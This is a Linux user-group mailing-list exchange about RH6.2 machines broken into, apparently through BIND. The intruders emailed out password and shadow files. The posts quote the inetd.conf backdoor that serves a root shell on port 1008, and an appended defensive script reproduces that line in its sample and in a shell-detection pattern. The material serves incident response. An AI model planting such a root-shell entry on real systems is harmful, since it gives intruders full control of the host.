> This occurred to me as well last night - I think around 3am. Similarly, it
> was discovered because the mail destination domain could not be found.
> However, I think this is because somewhere in the process of getting in,
> they broke my local named (i wasn't working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors". The email contained the output of ifconfig and the contents of
> /etc/passwd and /etc/shadow.
My local named seemed ok. Contents of my email exactly as you describe.
> The ISP I was on was Telstra bigpond - if it's the same, maybe they were
> scanning that range of addresses.
I was on ihug.
> The other change I found was the following entry on the end of
> /etc/inetd.conf:
> 1008 stream tcp nowait root /bin/sh sh
>
> which you may want to check for and remove/comment.
That's in mine too! Now commented.
> I am thinking it could have been the BIND exploit coming active, but not
> sure (I haven't upgraded yet, and my listen-on clause was broken -
> now fixed not to listen outside).
>
> The fact that they edited /etc/inetd.conf and cat-d shadow indicates root
> privileges. However, there doesn't seem to be any evidence of things inside
> or other changes, so possibly a buffer of exploit type deal?
>
> I run RH6.2 btw :)
So do I.
> The only services I had running out of inetd were ftp, telnet and auth
> (first 2 are shut down until I get home to tighten things) - not portmap.
>
> Makes you wonder if one should send an edited email with prepared IP and
> ready a box to trace what happens :)
Was your email also addressed to [EMAIL PROTECTED]?
--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug
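As an added example that is not part of the thread above: the suggested check of /etc/inetd.conf for entries like the one quoted (a root-owned service whose server program is a shell) can be scripted rather than eyeballed. The script below is my own, not from either poster; it runs a small awk filter over a constructed sample inetd.conf (assumed content, with the quoted backdoor line appended) and prints every active entry whose service field is a bare port number or whose server program is a shell. It assumes a POSIX sh and awk, which any RH6.2 box has.

```shell
#!/bin/sh
# Constructed sample of an RH6.2-style /etc/inetd.conf (assumed content, not
# copied from any real host), with the backdoor line from the thread appended.
SAMPLE_INETD_CONF='# /etc/inetd.conf (constructed sample)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
auth    stream  tcp     nowait  nobody  /usr/sbin/in.identd in.identd -l -e -o
#shell  stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
1008 stream tcp nowait root /bin/sh sh'

# find_shell_services: read inetd.conf lines on stdin and print each active
# (uncommented) entry that looks like a bound shell:
#   - the service field is a bare port number instead of a name from
#     /etc/services (legitimate entries normally use the name), or
#   - the server-program field (column 6) is a shell binary.
# Lines that only wrap a daemon in tcpd are not flagged.
find_shell_services() {
    awk '
        /^[[:space:]]*#/ || NF < 6 { next }      # skip comments and short lines
        {
            svc = $1; prog = $6; suspicious = 0
            if (svc ~ /^[0-9]+$/) suspicious = 1
            if (prog ~ /(^|\/)(sh|bash|ksh|csh|tcsh|zsh)$/) suspicious = 1
            if (suspicious) print
        }
    '
}

# Usage against the sample; on a real host replace the printf with
#   find_shell_services < /etc/inetd.conf
printf '%s\n' "$SAMPLE_INETD_CONF" | find_shell_services
```

Only the appended "1008 ... /bin/sh sh" line is printed; the ftp, telnet and auth entries and the commented-out rsh line pass. Any line this prints should be commented out and inetd sent a SIGHUP, and the host treated as compromised since the entry could only have been written as root.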